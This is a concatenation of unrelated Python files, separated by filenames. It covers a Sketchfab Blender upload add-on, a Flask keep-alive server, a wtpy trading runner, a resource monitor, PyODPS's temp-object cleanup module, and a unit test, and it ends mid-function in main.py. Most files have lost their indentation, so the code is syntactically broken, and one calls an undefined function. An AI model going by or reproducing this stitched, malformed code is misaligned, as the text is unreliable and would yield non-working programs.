login.email = cache_data['username']
if 'access_token' in cache_data:
props.skfb_api.access_token = cache_data['access_token']
props.skfb_api.build_headers()
props.skfb_api.request_user_info()
props.skfb_api.use_mail = True
elif 'api_token' in cache_data:
props.skfb_api.api_token = cache_data['api_token']
props.skfb_api.build_headers()
props.skfb_api.request_user_info()
props.skfb_api.use_mail = False
global is_plugin_enabled
is_plugin_enabled = True
try:
requests.get(Config.SKETCHFAB_PLUGIN_VERSION, hooks={'response': check_plugin_version})
except Exception as e:
print('Error when checking for version: {}'.format(e))
run_default_search()
class SketchfabEnable(bpy.types.Operator):
"""Activate the addon (checks login, cache folders...)"""
bl_idname = "wm.skfb_enable"
bl_label = "Sketchfab"
bl_options = {'INTERNAL'}
enable : BoolProperty(default=True)
def execute(self, context):
if self.enable:
activate_plugin()
return {'FINISHED'}
class SketchfabExportProps(bpy.types.PropertyGroup):
description : StringProperty(
name="Description",
description="Description of the model (optional)",
default="",
maxlen=1024)
filepath : StringProperty(
name="Filepath",
description="internal use",
default="",
)
selection : BoolProperty(
name="Selection only",
description="Determines which meshes are exported",
default=False,
)
private : BoolProperty(
name="Private",
description="Upload as private (requires a pro account)",
default=False,
)
draft : BoolProperty(
name="Draft",
description="Do not publish the model",
default=True,
)
password : StringProperty(
name="Password",
description="Password-protect your model (requires a pro account)",
default="",
)
tags : StringProperty(
name="Tags",
description="List of tags (42 max), separated by spaces (optional)",
default="",
)
title : StringProperty(
name="Title",
description="Title of the model (determined automatically if left empty)",
default="",
maxlen=48
)
reuploadBoolean : BoolProperty(
name="Reupload",
description="Reupload the model over an existing one",
default=False,
)
reuploadPath : StringProperty(
name="Url",
description="Paste full model url to reupload to",
default="",
maxlen=1024)
active_project : EnumProperty(
name="Project",
items=get_org_projects,
description="Active project",
update=refresh_orgs
)
class _SketchfabState:
"""Singleton to store state"""
__slots__ = (
"uploading",
"size_label",
"model_url",
"report_message",
"report_type",
)
def __init__(self):
self.uploading = False
self.size_label = ""
self.model_url = ""
self.report_message = ""
self.report_type = ''
sf_state = _SketchfabState()
del _SketchfabState
# remove file copy
def terminate(filepath):
print(filepath)
os.remove(filepath)
os.rmdir(os.path.dirname(filepath))
def upload_report(report_message, report_type):
sf_state.report_message = report_message
sf_state.report_type = report_type
# upload the blend-file to sketchfab
def upload(filepath, filename):
props = get_sketchfab_props()
api = props.skfb_api
wm = bpy.context.window_manager
props = wm.sketchfab_export
title = props.title
if not title:
title = os.path.splitext(os.path.basename(bpy.data.filepath))[0]
# Limit the number of tags to 42
props.tags = " ".join(props.tags.split(" ")[:42])
_data = {
"name": title,
"description": props.description,
"tags": props.tags,
"private": props.private,
"isPublished": not props.draft,
"password": props.password,
"source": "blender-exporter",
}
_files = {
"modelFile": open(filepath, 'rb'),
}
_headers = api.headers
uploadUrl = ""
modelUid = ""
requestFunction = requests.post
# Are we reuploading ?
if props.reuploadBoolean:
requestFunction = requests.put
if "sketchfab.com/" not in props.reuploadPath:
return upload_report("reupload url is malformed %s" % props.reuploadPath, 'ERROR')
# Get the model uid
try:
modelUid = props.reuploadPath[-32:]
if not Utils.is_valid_uuid(modelUid):
return upload_report("reupload url does not end with a valid uid (32 characters string): %s" % props.reuploadPath, 'ERROR')
except:
return upload_report("reupload url is malformed %s" % props.reuploadPath, 'ERROR')
# If the model is in an org, find if the user has access to it
if "/orgs/" in props.reuploadPath:
            try:
                orgName = props.reuploadPath.split("/orgs/")[1].split("/")[0]
                user_orgs = api.user_orgs
                orgUid = ""
                for org in user_orgs:
                    if org["username"] == orgName:
                        orgUid = org["uid"]
                        break
                if orgUid:
                    uploadUrl = '{}/{}/models/{}'.format(Config.SKETCHFAB_ORGS, orgUid, modelUid)
                else:
                    return upload_report("User does not appear to belong to org %s" % (orgName), 'ERROR')
            except Exception:
                return upload_report("Cannot parse the org name from the url %s" % props.reuploadPath, 'ERROR')
# Otherwise, request a direct reupload
else:
uploadUrl = '{}/{}'.format(Config.SKETCHFAB_MODEL, modelUid)
_data = {
"uid" : modelUid,
"source": "blender-exporter"
}
else:
# Org or not
if len(api.user_orgs) and api.use_org_profile:
uploadUrl = "%s/%s/models" % (Config.SKETCHFAB_ORGS, api.active_org["uid"])
_data["orgProject"] = props.active_project
else:
uploadUrl = Config.SKETCHFAB_MODEL
# Upload and parse the result
try:
print("Uploading to %s" % uploadUrl)
r = requestFunction(
uploadUrl,
data = _data,
files = _files,
headers = _headers
)
except requests.exceptions.RequestException as e:
return upload_report("Upload failed. Error: %s" % str(e), 'WARNING')
if r.status_code not in [requests.codes.ok, requests.codes.created, requests.codes.no_content]:
return upload_report("Upload failed. Error code: %s\nMessage:\n%s" % (str(r.status_code), str(r)), 'WARNING')
else:
try:
result = r.json()
sf_state.model_url = Config.SKETCHFAB_URL + "/models/" + result["uid"]
except:
sf_state.model_url = Config.SKETCHFAB_URL + "/models/" + modelUid
return upload_report("Upload complete. Available on your sketchfab.com dashboard.", 'INFO')
class ExportSketchfab(bpy.types.Operator):
"""Upload your model to Sketchfab"""
bl_idname = "wm.sketchfab_export"
bl_label = "Upload"
_timer = None
_thread = None
def modal(self, context, event):
if event.type == 'TIMER':
if not self._thread.is_alive():
wm = context.window_manager
props = wm.sketchfab_export
terminate(props.filepath)
if context.area:
context.area.tag_redraw()
# forward message from upload thread
if not sf_state.report_type:
sf_state.report_type = 'ERROR'
self.report({sf_state.report_type}, sf_state.report_message)
wm.event_timer_remove(self._timer)
self._thread.join()
sf_state.uploading = False
return {'FINISHED'}
return {'PASS_THROUGH'}
def execute(self, context):
if sf_state.uploading:
self.report({'WARNING'}, "Please wait till current upload is finished")
return {'CANCELLED'}
wm = context.window_manager
props = wm.sketchfab_export
sf_state.model_url = ""
# Prepare to save the file
binary_path = bpy.app.binary_path
script_path = os.path.dirname(os.path.realpath(__file__))
basename, ext = os.path.splitext(bpy.data.filepath)
if not basename:
basename = os.path.join(basename, "temp")
if not ext:
ext = ".blend"
tempdir = tempfile.mkdtemp()
filepath = os.path.join(tempdir, "export-sketchfab" + ext)
SKETCHFAB_EXPORT_DATA_FILE = os.path.join(tempdir, "export-sketchfab.json")
try:
# save a copy of actual scene but don't interfere with the users models
bpy.ops.wm.save_as_mainfile(filepath=filepath, compress=True, copy=True)
with open(SKETCHFAB_EXPORT_DATA_FILE, 'w') as s:
json.dump({
"selection": props.selection,
}, s)
subprocess.check_call([
binary_path,
"--background",
"-noaudio",
filepath,
"--python", os.path.join(script_path, "pack_for_export.py"),
"--", tempdir
])
os.remove(filepath)
# read subprocess call results
with open(SKETCHFAB_EXPORT_DATA_FILE, 'r') as s:
r = json.load(s)
size = r["size"]
props.filepath = r["filepath"]
filename = r["filename"]
os.remove(SKETCHFAB_EXPORT_DATA_FILE)
except Exception as e:
self.report({'WARNING'}, "Error occured while preparing your file: %s" % str(e))
return {'FINISHED'}
# Check the generated file size against the user plans, to know if the upload will succeed
upload_limit = Config.SKETCHFAB_UPLOAD_LIMITS[get_sketchfab_props().skfb_api.plan_type]
if get_sketchfab_props().skfb_api.use_org_profile:
upload_limit = Config.SKETCHFAB_UPLOAD_LIMITS["enterprise"]
if size > upload_limit:
human_size_limit = Utils.humanify_size(upload_limit)
human_exported_size = Utils.humanify_size(size)
self.report({'ERROR'}, "Upload size is above your plan upload limit: %s > %s" % (human_exported_size, human_size_limit))
return {'FINISHED'}
sf_state.uploading = True
sf_state.size_label = Utils.humanify_size(size)
self._thread = threading.Thread(
target=upload,
args=(props.filepath, filename),
)
self._thread.start()
wm.modal_handler_add(self)
self._timer = wm.event_timer_add(1.0, window=context.window)
return {'RUNNING_MODAL'}
def cancel(self, context):
wm = context.window_manager
wm.event_timer_remove(self._timer)
self._thread.join()
def get_temporary_path():
# Get the preferences cache directory
cachePath = bpy.context.preferences.addons[__name__.split('.')[0]].preferences.cachePath
# The cachePath was set in the preferences
if cachePath:
return cachePath
else:
# Rely on Blender temporary directory
if bpy.app.version == (2, 79, 0):
if bpy.context.user_preferences.filepaths.temporary_directory:
return bpy.context.user_preferences.filepaths.temporary_directory
else:
return tempfile.mkdtemp()
else:
if bpy.context.preferences.filepaths.temporary_directory:
return bpy.context.preferences.filepaths.temporary_directory
else:
return tempfile.mkdtemp()
def updateCacheDirectory(self, context):
# Get the cache path from the preferences, or a default temporary
path = os.path.abspath(get_temporary_path())
# Delete the old directory
    # Won't delete anything upon plugin initialization, only when switching path in preferences
if Config.SKETCHFAB_TEMP_DIR and os.path.exists(Config.SKETCHFAB_TEMP_DIR) and os.path.isdir(Config.SKETCHFAB_TEMP_DIR):
shutil.rmtree(Config.SKETCHFAB_TEMP_DIR)
# Create the paths and directories for temporary directories
Config.SKETCHFAB_TEMP_DIR = os.path.join(path, "sketchfab_downloads")
Config.SKETCHFAB_THUMB_DIR = os.path.join(Config.SKETCHFAB_TEMP_DIR, 'thumbnails')
Config.SKETCHFAB_MODEL_DIR = os.path.join(Config.SKETCHFAB_TEMP_DIR, 'imports')
if not os.path.exists(Config.SKETCHFAB_TEMP_DIR): os.makedirs(Config.SKETCHFAB_TEMP_DIR)
if not os.path.exists(Config.SKETCHFAB_THUMB_DIR): os.makedirs(Config.SKETCHFAB_THUMB_DIR)
if not os.path.exists(Config.SKETCHFAB_MODEL_DIR): os.makedirs(Config.SKETCHFAB_MODEL_DIR)
class SketchfabAddonPreferences(bpy.types.AddonPreferences):
bl_idname = __name__
cachePath: StringProperty(
name="Cache folder",
description=(
"Temporary directory for downloads from sketchfab.com\n"
"Set by the OS by default, make sure to have write access\n"
"to this directory if you set it manually"
),
subtype='DIR_PATH',
update=updateCacheDirectory
)
downloadHistory : StringProperty(
name="Download history file",
description=(
".csv file containing your downloads from sketchfab.com\n"
"If valid, the name, license and url of every model you\n"
"download through the plugin will be saved in this file"
),
subtype='FILE_PATH'
)
def draw(self, context):
layout = self.layout
layout.prop(self, "cachePath", text="Download directory")
layout.prop(self, "downloadHistory", text="Download history (.csv)")
classes = (
SketchfabAddonPreferences,
# Properties
SketchfabBrowserProps,
SketchfabLoginProps,
SketchfabBrowserPropsProxy,
SketchfabExportProps,
# Panels
LoginPanel,
TeamsPanel,
SketchfabBrowse,
SketchfabExportPanel,
SketchfabPanel,
# Operators
SketchfabEnable,
SketchfabCreateAccount,
LoginModal,
SketchfabNewVersion,
SketchfabHelp,
SketchfabReportIssue,
SketchfabSearch,
SketchfabSearchPreviousResults,
SketchfabSearchNextResults,
ImportModalOperator,
ViewOnSketchfab,
SketchfabDownloadModel,
SketchfabLogger,
ExportSketchfab,
)
def check_plugin_version(request, *args, **kwargs):
response = request.json()
skfb = get_sketchfab_props()
if response and len(response):
latest_release_version = response[0]['tag_name'].replace('.', '')
current_version = str(bl_info['version']).replace(',', '').replace('(', '').replace(')', '').replace(' ', '')
if latest_release_version == current_version:
            print('You are using the latest version ({})'.format(response[0]['tag_name']))
skfb.is_latest_version = 1
else:
print('A new version is available: {}'.format(response[0]['tag_name']))
skfb.is_latest_version = 0
else:
print('Failed to retrieve plugin version')
skfb.is_latest_version = -2
def register():
sketchfab_icon = bpy.utils.previews.new()
icons_dir = os.path.join(os.path.dirname(__file__), "resources")
sketchfab_icon.load("skfb", os.path.join(icons_dir, "logo.png"), 'IMAGE')
sketchfab_icon.load("0", os.path.join(icons_dir, "placeholder.png"), 'IMAGE')
res = []
res.append(('NORESULTS', 'empty', "", sketchfab_icon['0'].icon_id, 0))
preview_collection['default'] = tuple(res)
preview_collection['skfb'] = sketchfab_icon
bpy.types.WindowManager.result_previews = EnumProperty(items=list_current_results)
for cls in classes:
bpy.utils.register_class(cls)
bpy.types.WindowManager.sketchfab_browser = PointerProperty(
type=SketchfabBrowserProps)
bpy.types.WindowManager.sketchfab_browser_proxy = PointerProperty(
type=SketchfabBrowserPropsProxy)
bpy.types.WindowManager.sketchfab_api = PointerProperty(
type=SketchfabLoginProps,
)
bpy.types.WindowManager.sketchfab_export = PointerProperty(
type=SketchfabExportProps,
)
# If a cache path was set in preferences, use it
updateCacheDirectory(None, context=bpy.context)
def unregister():
for cls in classes:
bpy.utils.unregister_class(cls)
del bpy.types.WindowManager.sketchfab_api
del bpy.types.WindowManager.sketchfab_browser
del bpy.types.WindowManager.sketchfab_browser_proxy
del bpy.types.WindowManager.sketchfab_export
bpy.utils.previews.remove(preview_collection['skfb'])
del bpy.types.WindowManager.result_previews
Utils.clean_thumbnail_directory()
if __name__ == "__main__":
register()
|
keep_alive.py
|
from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def main():
return "Subscribe TSO in next 3 seconds or U get booted offline"
def run():
app.run(host="0.0.0.0", port=8080)
def keep_alive():
server = Thread(target=run)
server.start()
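# Typical usage (assumption: called from the entry point of a long-running
# script hosted where an external uptime monitor pings port 8080):
#   from keep_alive import keep_alive
#   keep_alive()        # starts the Flask server on a background thread
#   run_main_loop()     # hypothetical main work of the hosting script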
|
run.py
|
from wtpy import BaseExtParser, BaseExtExecuter
from wtpy import WTSTickStruct
from ctypes import byref
import threading
import time
from wtpy import WtEngine,EngineType
from Strategies.DualThrust import StraDualThrust
class MyExecuter(BaseExtExecuter):
def __init__(self, id: str, scale: float):
super().__init__(id, scale)
def init(self):
print("inited")
def set_position(self, stdCode: str, targetPos: float):
print("position confirmed: %s -> %f " % (stdCode, targetPos))
class MyParser(BaseExtParser):
def __init__(self, id: str):
super().__init__(id)
self.__worker__ = None
def init(self, engine:WtEngine):
        '''
        Initialization
        '''
super().init(engine)
def random_sim(self):
while True:
curTick = WTSTickStruct()
curTick.code = bytes("IF2106", encoding="UTF8")
curTick.exchg = bytes("CFFEX", encoding="UTF8")
self.__engine__.push_quote_from_extended_parser(self.__id__, byref(curTick), True)
time.sleep(1)
def connect(self):
        '''
        Start the connection
        '''
print("connect")
if self.__worker__ is None:
self.__worker__ = threading.Thread(target=self.random_sim, daemon=True)
self.__worker__.start()
return
def disconnect(self):
        '''
        Disconnect
        '''
print("disconnect")
return
def release(self):
        '''
        Release resources, usually called when the process exits
        '''
print("release")
return
def subscribe(self, fullCode:str):
        '''
        Subscribe to real-time quotes\n
        @fullCode contract code, e.g. CFFEX.IF2106
        '''
# print("subscribe: " + fullCode)
return
def unsubscribe(self, fullCode:str):
        '''
        Unsubscribe from real-time quotes\n
        @fullCode contract code, e.g. CFFEX.IF2106
        '''
# print("unsubscribe: " + fullCode)
return
if __name__ == "__main__":
    # Create a runtime environment and add the strategy
engine = WtEngine(EngineType.ET_CTA)
engine.init('./common/', "config.json")
straInfo = StraDualThrust(name='pydt_au', code="SHFE.au.HOT", barCnt=50, period="m5", days=30, k1=0.2, k2=0.2, isForStk=False)
engine.add_cta_strategy(straInfo)
myParser = MyParser("test")
myExecuter = MyExecuter('exec', 1)
engine.commitConfig()
engine.add_exetended_parser(myParser)
engine.add_exetended_executer(myExecuter)
engine.run()
kw = input('press any key to exit\n')
|
sensor_scheduler.py
|
#! /usr/bin/python
# encoding: utf-8
import re
import os
import sys
import platform
import psutil
import subprocess
import threading
import time
def lin_process():
process = psutil.Process(os.getpid())
# Displays the physical memory usage of the system
print "\n ########## PHYSICAL MEMORY USAGE ##########"
print "\n Memory Currently Used: "+str(process.memory_full_info().rss)
print "\n Percentage Memory Used: "+str(process.memory_percent())
# Displays the system disk utlization. USED vs. AVAILABLE
print "\n ########## DISK UTILIZATION for RESIDING FILE SYSTEM ##########"
bash_command_u = "df -h|grep /dev/disk1|awk '{print $3}' " # Change the hdd location here. So instead of /dev/sda1|awk - it should reflect your mount address
print "\n Used Disk Space: "+str(subprocess.check_output(['bash', '-c', bash_command_u]))
bash_command_a = "df -h|grep /dev/disk1|awk '{print $4}' " # Change the hdd location here. So instead of /dev/sda1|awk - it should reflect your mount address
print " Available Disk Space: "+str(subprocess.check_output(['bash', '-c', bash_command_a]))
# Displays the virtual memory usage
print " ########## VIRTUAL MEMORY USAGE ##########"
print "\n Virtual Memory Used: "+str(psutil.virtual_memory().used)
print "\n Virtual Memory Available: "+str(psutil.virtual_memory().available)
print "\n ########## SWAP MEMORY USAGE ##########"
# Displays the swap memory usage
print "\n Swap Memory Used: "+str(psutil.swap_memory().used)
print "\n Swap Memory Available: "+str(psutil.swap_memory().free)
'''
# This chunk of code that is commented out checks for the CPU temperature.
# It has a few pre-requisites that need to be in place before it can run successfully.
print "\n ########## CPU TEMPATURE CHECK ##########"
print psutil.sensors_temperatures()
if subprocess.check_output("sensors") ==1:
print "No sensors found or available!"
else:
temperatures = {match[0]: float(match[1]) for match in re.findall("^(.*?)\:s+\+?(.*?)°C", sensors, re.MULTILINE)}
disk = "/dev/sda"
output = subprocess.check_output(["smartctl", "-A", disk])
temperatures[disk] = int(re.search("Temperature.*\s(\d+)\s*(?:\([\d\s]*\)|)$", output, re.MULTILINE).group(1))
print "\nTemperature:"+str(temperatures[disk])
print "\nSensors temperature:"+str(psutil.sensors_temperatures())
'''
    time.sleep(10)
def main():
# Operating system and platform validation
if platform.system()=="Linux" or platform.system()=="Darwin":
        # Run the resource check in a worker thread (lin_process takes no arguments)
        t1 = threading.Thread(target=lin_process)
t1.start()
t1.join()
elif platform.system()=="Windows":
win_process()
if __name__=="__main__":
main()
|
tempobj.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2017 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
import copy
import glob
import hashlib
import json
import os
import platform
import subprocess
import sys
import tempfile
import stat
import threading
import time
import uuid
from .accounts import AliyunAccount
from .compat import PY26, pickle, six, builtins, futures
from .config import options
from .errors import NoSuchObject
from . import utils
TEMP_ROOT = utils.build_pyodps_dir('tempobjs')
SESSION_KEY = '%d_%s' % (int(time.time()), uuid.uuid4())
CLEANER_THREADS = 100
USER_FILE_RIGHTS = stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR
CLEANUP_SCRIPT_TMPL = u"""
#-*- coding:utf-8 -*-
import os
import sys
import json
try:
os.unlink(os.path.realpath(__file__))
except Exception:
pass
temp_codes = json.loads({odps_info!r})
import_paths = json.loads({import_paths!r})
biz_ids = json.loads({biz_ids!r})
if sys.version_info[0] < 3:
if sys.platform == 'win32':
import_paths = [p.encode('mbcs') for p in import_paths]
else:
import_paths = [p.encode() for p in import_paths]
normed_paths = set(os.path.normcase(os.path.normpath(p)) for p in sys.path)
import_paths = [p for p in import_paths
if os.path.normcase(os.path.normpath(p)) not in normed_paths]
sys.path.extend(import_paths)
from odps import ODPS, tempobj
if os.environ.get('WAIT_CLEANUP') == '1':
tempobj.cleanup_timeout = None
else:
tempobj.cleanup_timeout = 5
tempobj.cleanup_mode = True
tempobj.host_pid = {host_pid}
tempobj.ObjectRepositoryLib.biz_ids = set(biz_ids)
for o_desc in temp_codes:
ODPS(**tempobj.compat_kwargs(o_desc))
os._exit(0)
""".lstrip()
cleanup_mode = False
cleanup_timeout = 0
host_pid = os.getpid()
class ExecutionEnv(object):
def __init__(self, **kwargs):
self.cleaned = False
self.os = os
self.sys = sys
self._g_env = copy.copy(globals())
self.is_windows = 'windows' in platform.platform().lower()
self.pid = os.getpid()
self.os_sep = os.sep
self.executable = sys.executable
self.six = six
import_paths = copy.deepcopy(sys.path)
package_root = os.path.dirname(__file__)
if package_root not in import_paths:
import_paths.append(package_root)
self.import_path_json = utils.to_text(json.dumps(import_paths, ensure_ascii=False))
self.builtins = builtins
self.io = __import__('io', fromlist=[''])
if six.PY3:
self.conv_bytes = (lambda s: s.encode() if isinstance(s, str) else s)
self.conv_unicode = (lambda s: s if isinstance(s, str) else s.decode())
else:
self.conv_bytes = (lambda s: s.encode() if isinstance(s, unicode) else s)
self.conv_unicode = (lambda s: s if isinstance(s, unicode) else s.decode())
self.subprocess = subprocess
self.temp_dir = tempfile.gettempdir()
self.template = CLEANUP_SCRIPT_TMPL
self.file_right = USER_FILE_RIGHTS
self.is_main_process = utils.is_main_process()
for k, v in six.iteritems(kwargs):
setattr(self, k, v)
class TempObject(object):
__slots__ = []
_type = ''
_priority = 0
def __init__(self, *args, **kwargs):
for k, v in zip(self.__slots__, args):
setattr(self, k, v)
for k in self.__slots__:
if hasattr(self, k):
continue
setattr(self, k, kwargs.get(k))
def __hash__(self):
if self.__slots__:
return hash(tuple(getattr(self, k) for k in self.__slots__))
return super(TempObject, self).__hash__()
def __eq__(self, other):
if not isinstance(other, TempObject):
return False
if self._type != other._type:
return False
return all(getattr(self, k) == getattr(other, k) for k in self.__slots__)
def __ne__(self, other):
return not self.__eq__(other)
def __getstate__(self):
return dict((slot, getattr(self, slot)) for slot in self.__slots__ if hasattr(self, slot))
def __setstate__(self, state):
for slot, value in state.items():
setattr(self, slot, value)
class TempTable(TempObject):
__slots__ = 'table', 'project'
_type = 'Table'
def drop(self, odps):
odps.run_sql('drop table if exists %s' % self.table, project=self.project)
class TempModel(TempObject):
__slots__ = 'model', 'project'
_type = 'OfflineModel'
def drop(self, odps):
try:
odps.delete_offline_model(self.model, self.project)
except NoSuchObject:
pass
class TempFunction(TempObject):
__slots__ = 'function', 'project'
_type = 'Function'
_priority = 1
def drop(self, odps):
try:
odps.delete_function(self.function, self.project)
except NoSuchObject:
pass
class TempResource(TempObject):
__slots__ = 'resource', 'project'
_type = 'Resource'
def drop(self, odps):
try:
odps.delete_resource(self.resource, self.project)
except NoSuchObject:
pass
class TempVolumePartition(TempObject):
__slots__ = 'volume', 'partition', 'project'
_type = 'VolumePartition'
def drop(self, odps):
try:
odps.delete_volume_partition(self.volume, self.partition, self.project)
except NoSuchObject:
pass
class ObjectRepository(object):
def __init__(self, file_name):
self._container = set()
self._file_name = file_name
if file_name and os.path.exists(file_name):
self.load()
def put(self, obj, dump=True):
self._container.add(obj)
if dump:
self.dump()
def cleanup(self, odps, use_threads=True):
cleaned = []
def _cleaner(obj):
try:
obj.drop(odps)
cleaned.append(obj)
except:
pass
if self._container:
if use_threads:
pool = futures.ThreadPoolExecutor(CLEANER_THREADS)
list(pool.map(_cleaner, reversed(list(self._container))))
else:
for o in sorted(list(self._container), key=lambda ro: type(ro)._priority, reverse=True):
_cleaner(o)
for obj in cleaned:
if obj in self._container:
self._container.remove(obj)
if not self._container and self._file_name:
try:
os.unlink(self._file_name)
except OSError:
pass
else:
self.dump()
def dump(self):
if self._file_name is None:
return
try:
with open(self._file_name, 'wb') as outf:
pickle.dump(list(self._container), outf, protocol=0)
outf.close()
except OSError:
return
os.chmod(self._file_name, USER_FILE_RIGHTS)
def load(self):
try:
with open(self._file_name, 'rb') as inpf:
contents = pickle.load(inpf)
self._container.update(contents)
except (EOFError, OSError):
pass
class ObjectRepositoryLib(dict):
biz_ids = set([options.biz_id, ]) if options.biz_id else set(['default', ])
odps_info = dict()
biz_ids_json = json.dumps(list(biz_ids))
odps_info_json = json.dumps([v for v in six.itervalues(odps_info)])
def __init__(self, *args, **kwargs):
super(ObjectRepositoryLib, self).__init__(*args, **kwargs)
self._env = ExecutionEnv()
def __del__(self):
self._exec_cleanup_script()
@classmethod
def add_biz_id(cls, biz_id):
cls.biz_ids.add(biz_id)
cls.biz_ids_json = json.dumps(list(cls.biz_ids))
@classmethod
def add_odps_info(cls, odps):
odps_key = _gen_repository_key(odps)
cls.odps_info[odps_key] = dict(
access_id=odps.account.access_id, secret_access_key=odps.account.secret_access_key,
project=odps.project, endpoint=odps.endpoint
)
cls.odps_info_json = json.dumps([v for v in six.itervalues(cls.odps_info)])
def _exec_cleanup_script(self):
global cleanup_mode
if not self:
return
env = self._env
if cleanup_mode or not env.is_main_process or env.cleaned:
return
env.cleaned = True
script = env.template.format(import_paths=env.import_path_json, odps_info=self.odps_info_json,
host_pid=env.pid, biz_ids=self.biz_ids_json)
script_name = env.temp_dir + env.os_sep + 'tmp_' + str(env.pid) + '_cleanup_script.py'
script_file = env.io.FileIO(script_name, 'w')
script_file.write(env.conv_bytes(script))
script_file.close()
try:
if env.is_windows:
env.os.chmod(script_name, env.file_right)
else:
env.subprocess.call(['chmod', oct(env.file_right).replace('o', ''), script_name])
except:
pass
kwargs = dict(close_fds=True)
if env.is_windows:
si = subprocess.STARTUPINFO()
si.dwFlags |= subprocess.STARTF_USESHOWWINDOW
kwargs['startupinfo'] = si
env.subprocess.call([env.executable, script_name], **kwargs)
_cleaned_keys = set()
_obj_repos = ObjectRepositoryLib() # this line should be put last due to initialization dependency
atexit.register(_obj_repos._exec_cleanup_script)
def _is_pid_running(pid):
if 'windows' in platform.platform().lower():
task_lines = os.popen('TASKLIST /FI "PID eq {0}" /NH'.format(pid)).read().strip().splitlines()
if not task_lines:
return False
return str(pid) in set(task_lines[0].split())
else:
try:
os.kill(pid, 0)
return True
except OSError:
return False
def clean_objects(odps, biz_ids=None):
odps_key = _gen_repository_key(odps)
files = []
biz_ids = biz_ids or _obj_repos.biz_ids
for biz_id in biz_ids:
files.extend(glob.glob(os.path.join(TEMP_ROOT, biz_id, odps_key, '*.his')))
for fn in files:
repo = ObjectRepository(fn)
repo.cleanup(odps, use_threads=False)
def clean_stored_objects(odps):
global cleanup_timeout, host_pid
if not utils.is_main_process():
return
odps_key = _gen_repository_key(odps)
if odps_key in _cleaned_keys:
return
_cleaned_keys.add(odps_key)
files = []
for biz_id in _obj_repos.biz_ids:
files.extend(glob.glob(os.path.join(TEMP_ROOT, biz_id, odps_key, '*.his')))
def clean_thread():
for fn in files:
writer_pid = int(fn.rsplit('__', 1)[-1].split('.', 1)[0])
# we do not clean running process, unless its pid equals host_pid
if writer_pid != host_pid and _is_pid_running(writer_pid):
continue
repo = ObjectRepository(fn)
repo.cleanup(odps)
thread_obj = threading.Thread(target=clean_thread)
thread_obj.start()
if cleanup_timeout == 0:
return
else:
if cleanup_timeout is not None and cleanup_timeout < 0:
cleanup_timeout = None
thread_obj.join(cleanup_timeout)
def _gen_repository_key(odps):
if hasattr(odps.account, 'access_id'):
keys = [odps.account.access_id, odps.endpoint, str(odps.project)]
elif hasattr(odps.account, 'token'):
keys = [utils.to_str(odps.account.token), odps.endpoint, str(odps.project)]
return hashlib.md5(utils.to_binary('####'.join(keys))).hexdigest()
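# Illustrative note: for an AliyunAccount the key is simply an MD5 over the
# joined credentials, so two ODPS objects with the same access_id / endpoint /
# project share one on-disk history directory, i.e.
#   hashlib.md5(utils.to_binary('####'.join(
#       [odps.account.access_id, odps.endpoint, str(odps.project)]))).hexdigest()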
def _put_objects(odps, objs):
odps_key = _gen_repository_key(odps)
biz_id = options.biz_id if options.biz_id else 'default'
ObjectRepositoryLib.add_biz_id(biz_id)
if odps_key not in _obj_repos:
if isinstance(odps.account, AliyunAccount):
ObjectRepositoryLib.add_odps_info(odps)
file_dir = os.path.join(TEMP_ROOT, biz_id, odps_key)
try:
if not os.path.exists(file_dir):
os.makedirs(file_dir)
except OSError:
pass
file_name = os.path.join(file_dir, 'temp_objs_{0}__{1}.his'.format(SESSION_KEY, os.getpid()))
_obj_repos[odps_key] = ObjectRepository(file_name)
[_obj_repos[odps_key].put(o, False) for o in objs]
_obj_repos[odps_key].dump()
def register_temp_table(odps, table, project=None):
if isinstance(table, six.string_types):
table = [table, ]
_put_objects(odps, [TempTable(t, project if project else odps.project) for t in table])
def register_temp_model(odps, model, project=None):
if isinstance(model, six.string_types):
model = [model, ]
_put_objects(odps, [TempModel(m, project if project else odps.project) for m in model])
def register_temp_resource(odps, resource, project=None):
if isinstance(resource, six.string_types):
resource = [resource, ]
_put_objects(odps, [TempResource(r, project if project else odps.project) for r in resource])
def register_temp_function(odps, func, project=None):
if isinstance(func, six.string_types):
func = [func, ]
_put_objects(odps, [TempFunction(f, project if project else odps.project) for f in func])
def register_temp_volume_partition(odps, volume_partition_tuple, project=None):
if isinstance(volume_partition_tuple, tuple):
volume_partition_tuple = [volume_partition_tuple, ]
_put_objects(odps, [TempVolumePartition(v, p, project if project else odps.project)
for v, p in volume_partition_tuple])
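# Usage sketch (the table name is illustrative): registering a temporary object
# records it in this session's history file under TEMP_ROOT, so a later process
# can drop it via clean_stored_objects(odps) once the writer pid has exited, or
# it can be dropped explicitly:
#   register_temp_table(odps, 'tmp_pyodps_intermediate')
#   clean_objects(odps)   # drops every object recorded for this account/project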
def compat_kwargs(kwargs):
if PY26:
new_desc = dict()
for k, v in six.iteritems(kwargs):
new_desc[k.encode('utf-8') if isinstance(k, unicode) else k] = v.encode('utf-8')
return new_desc
else:
return kwargs
|
testRecorder.py
|
import unittest
from src.fileIO import fileInputOutput
from src.recorder import recorder
from src.trackable import trackable
from threading import Thread
import time
class testRecorder(unittest.TestCase):
def testAllRecorder(self):
testReader = fileInputOutput("logs/testLogs/testProcesses.txt","logs/testLogs/testTrackedData.txt")
testRecorder = recorder(testReader)
testList = []
testTrackable1 = trackable("testString", 0.0)
testList.append(testTrackable1)
testTrackable2 = trackable("python",0.0)
testList.append(testTrackable2)
for x in testList:
x.setForTrack()
t = Thread(target = testRecorder.turnOnRecording, name = "testthread1",args=(testList,))
t.start()
time.sleep(0.05)
self.assertEqual(testRecorder.isOn(), True)
testRecorder.turnOffRecording()
self.assertEqual(testTrackable1.getIsTracked(), False)
self.assertEqual(testTrackable2.getIsTracked(),True)
self.assertEqual(testRecorder.isOn(), False)
suite = unittest.TestLoader().loadTestsFromTestCase(testRecorder)
unittest.TextTestRunner(verbosity=2).run(suite)
|
main.py
|
from GetAPI import GetAPI
import threading
import time
stop_threads : bool = False
"""
Fonction allowing to refresh data all the 60 seconds on a thread
"""
def getapi_thread() -> None:
